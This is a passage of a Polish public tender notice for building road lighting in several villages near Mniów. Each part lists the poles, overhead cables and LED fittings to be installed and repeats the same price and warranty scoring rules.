życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 3 - „Budowa oświetlenia drogowego w msc. Mniów ul. Kamieniec”<br/>W ramach zadania nr 3 (Mniów ul. Kamieniec) przewidziano do wykonania m. in.: <br/>odcinek nr 1 <br/>1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 2 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10/200 w ilości 1 szt. <br/>3) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego na słupach o długości ok. 320 m wykonanej przewodem AsXSn 2x25 mm², <br/>4) montaż wysięgników oprawy oświetlenia drogowego – 3 szt. <br/>5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 36 W na wysięgniku – 3 kpl. <br/>odcinek nr 2 <br/>1) montaż i stawianie słupów linii napowietrznej nn typu E -10,5/4,3 w ilości 5 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu E -12/4,3 w ilości 2 szt. <br/>3) montaż i stawianie słupów linii napowietrznej nn typu ŻN -10/200 w ilości 2 szt. <br/>4) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego na słupach o długości ok. 480 m wykonanej przewodem AsXSn 2x25 mm², <br/>5) montaż wysięgników oprawy oświetlenia drogowego – 8 szt. <br/>6) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 36 W na wysięgniku – 8 kpl. <br/>7) montaż skrzynek sterowniczo-pomiarowych SOM 1 w ilości - 1 kpl. <br/>odcinek nr 3 <br/>1) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego na istniejących słupach o długości ok. 105 m wykonanej przewodem AsXSn 2x25 mm², <br/>2) montaż wysięgników oprawy oświetlenia drogowego – 2 szt. <br/> 3) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 100 W na wysięgniku – 2 kpl. <br/>4) montaż skrzynek sterowniczo-pomiarowych SOM 1 w ilości - 1 kpl </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 4 - „Budowa oświetlenia drogowego w msc. Mniów ul. Głęboka”<br/>W ramach zadania nr 4 (Mniów ul. Głęboka) przewidziano do wykonania m. in.: 1) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego na istniejących słupach o długości ok. 171 m wykonanej przewodem AsXSn 2x25 mm², <br/>2) montaż wysięgników oprawy oświetlenia drogowego – 5 szt. <br/>3) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 38 W na wysięgniku – 5 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 5 - „Budowa oświetlenia drogowego w msc. Borki”<br/>W ramach zadania nr 5 (Borki) przewidziano do wykonania m. in.: <br/>1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/6 w ilości 2 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 2 szt. <br/>3) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 5 szt. <br/>4) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 398 m wykonanej przewodem AsXSn 2x25 mm², <br/>5) montaż wysięgników oprawy oświetlenia drogowego – 5 szt. <br/>6) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 50 W na wysięgniku – 5 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 6 - „Budowa oświetlenia drogowego w msc. Pępice”<br/>W ramach zadania nr 6 (Pępice) przewidziano do wykonania m. in.: <br/>1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 6 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 7 szt. <br/>3) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 607 m wykonanej przewodem AsXSn 2x25 mm², <br/>4) montaż wysięgników oprawy oświetlenia drogowego – 8 szt. <br/>5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 50 W na wysięgniku – 8 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 7 - „Budowa oświetlenia drogowego w msc. Straszów”<br/>W ramach zadania nr 7 (Straszów) przewidziano do wykonania m. in.: 1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 7 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 6 szt. <br/>3) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 563 m wykonanej przewodem AsXSn 2x25 mm², <br/>4) montaż wysięgników oprawy oświetlenia drogowego – 8 szt. <br/> 5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 50 W na wysięgniku – 8 kpl. <br/>6) montaż skrzynek sterowniczo-pomiarowych SOM 1 w ilości - 1 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 8 - „Budowa oświetlenia drogowego w msc. Malmurzyn”<br/>W ramach zadania nr 8 (Malmurzyn) przewidziano do wykonania m. in.: 1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 5 szt. <br/>2) montaż i stawianie słupów linii napowietrznej nn typu ŻN - 10 w ilości 4 szt. <br/>3) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego o długości ok. 428 m wykonanej przewodem AsXSn 2x25 mm², <br/> 4) montaż wysięgników oprawy oświetlenia drogowego – 7 szt. <br/>5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 50 W na wysięgniku – 7 kpl. <br/>6) montaż skrzynek sterowniczo-pomiarowych SOM 1 w ilości - 1 kpl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45232210-7 - Roboty budowlane zakresie budowy linii napowietrznych</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta (spośród wszystkich złożonych w postępowaniu ofert niepodlegających odrzuceniu), która otrzyma największą łączną liczbę punków w poszczególnych kryteriach oceny ofert ( C+G). Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami:<br/> a. Kryterium „CENA” <br/> Oferta proponująca najniższą cenę otrzyma 60 pkt, pozostałe oferty będą punktowane według poniższego wzoru, z dokładnością do 1/100 punktu: <br/> C min<br/> C = ----------------------------x 60 <br/> C bad. <br/><br/> Gdzie: <br/> C - ilość punktów oferty badanej w kryterium cena <br/> C min - najniższa cena(brutto) spośród wszystkich podlegających ocenie ofert <br/> C bad. – cena (brutto) oferty badanej.<br/><br/> b. Kryterium „OKRES GWARANCJI i RĘKOJMI”: <br/> Minimalny okres gwarancji i rękojmi – 70 miesięcy od daty odbioru przedmiotu umowy. <br/> Maksymalny okres gwarancji i rękojmi– 110 miesięcy od daty odbioru przedmiotu umowy.<br/> Oferta proponująca maksymalny okres gwarancji otrzyma 40 pkt, pozostałe oferty będą punktowane według wzoru: <br/> <br/> gwarancja badanej oferty <br/> G = ------------------------------------------------------------------------- x 40 pkt <br/> najdłuższy okres gwarancji z ocenianych ofert <br/> <br/> 3. Jeżeli Wykonawca wskaże kilka okresów gwarancji lub nie zaznaczy żadnego terminu, Zamawiający przyjmie, że Wykonawca zaoferował minimalny okres gwarancji.<br/> 4. W przypadku zaoferowania okresu gwarancji powyżej 110 miesięcy, jako największą zaoferowaną ilość miesięcy, zamawiający do obliczeń przyjmie 110 miesięcy.<br/> 5. Obliczenia dokonane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie nr 9 - „Budowa oświetlenia drogowego w msc. Grzymałków ul. Spacerowa”<br/>W ramach zadania nr 9 (Grzymałków) przewidziano do wykonania m. in.: 1) montaż i stawianie słupów linii napowietrznej nn typu E - 10,5/4,3 w ilości 3 szt <br/>2) podwieszenie przewodów izolowanych linii napowietrznej oświetlenia drogowego na istniejących słupach o długości ok. 92 m wykonanej przewodem AsXSn 2x25 mm², <br/>3) układanie kabli w rowach kablowych o długości 85 m – kabel YAKXs 4x35 mm2 <br/>4) montaż wysięgników oprawy oświetlenia drogowego – 4 szt. (w tym 1 szt. na słupie nr 8/1 stacja Zaborowice 3) <br/>5) montaż opraw oświetlenia zewnętrznego wyposażone w system sterowania oświetleniem typu LED 52 W na wysięgniku – 4 kpl. (w tym 1 kpl. na słupie nr 8/1 stacja Zaborowice 3) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: 